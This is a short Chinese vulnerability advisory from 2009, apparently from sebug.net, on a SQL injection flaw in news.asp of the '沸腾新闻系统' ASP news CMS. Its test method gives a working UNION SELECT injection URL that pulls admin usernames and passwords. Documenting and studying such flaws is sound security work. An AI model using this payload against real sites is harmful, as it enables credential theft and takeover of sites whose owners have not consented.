沸腾新闻系统 V1.1 Access版 Finish(SP2) 注入漏洞
来源:岁月联盟
时间:2009-10-01
V1.1 Access版 Finish(SP2) 注入利用漏洞描述:
沸腾新闻系统是一套asp的cms系统
news.asp对相关参数过滤不严,存在sql注入漏洞。<*参考
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!+ News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2
